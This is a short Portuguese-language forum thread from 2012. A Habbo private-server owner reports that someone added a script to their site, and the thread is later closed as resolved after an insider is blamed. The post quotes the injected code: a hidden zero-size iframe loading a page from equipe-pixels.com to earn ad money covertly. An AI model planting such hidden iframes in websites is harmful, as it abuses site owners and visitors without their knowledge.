kimbosebol kimbosebol  • 23.07.12 13:58

Me ajudem sofri um golpe da MeuHabbo Empty Me ajudem sofri um golpe da MeuHabbo 23.07.12 13:58

Estou hospedado na MeuHabbo com 400 online, eles colocaram um script na /me pra ocultar adv.li ai fica tocando a musiquinha só e eles ganhando dinheiro, já tirei a prova apertei F12 na página e tinha um script fazendo isso no adv.li da equipe-pixels.com
Existe como eu hospedar por enquanto a LAVVOS CMS+Emulador num VPS sem derrubarem?


O Seguinte script foi adicionado na página: < iframe scrolling=no frameborder=0 width='0px' height='0px' src='http://equipe-pixels.com/ninja.html'>< /iframe>

Acabei de tirar rs

kimbosebol kimbosebol  • 23.07.12 16:48

Me ajudem sofri um golpe da MeuHabbo Empty Re: Me ajudem sofri um golpe da MeuHabbo 23.07.12 16:48

Moderador feche aqui, por favor, sem double post de ocorrencia o caso ja foi resolvido foi um membro da equipe que tinha acesso ás informações

JusTGame! JusTGame!  • 23.07.12 17:46

Me ajudem sofri um golpe da MeuHabbo Empty Re: Me ajudem sofri um golpe da MeuHabbo 23.07.12 17:46

Fechado e Movido

Fechado á Pedido do Autor

Movido á Questões Resolvidas

Conteúdo patrocinado  • 

Me ajudem sofri um golpe da MeuHabbo Empty Re: Me ajudem sofri um golpe da MeuHabbo

Permissões neste sub-fórum
Não podes responder a tópicos

BH Servers

Recomendamos a BH Servers com proteção DDOS gratuita em Cloud Server de alta performance. Entrega imediata.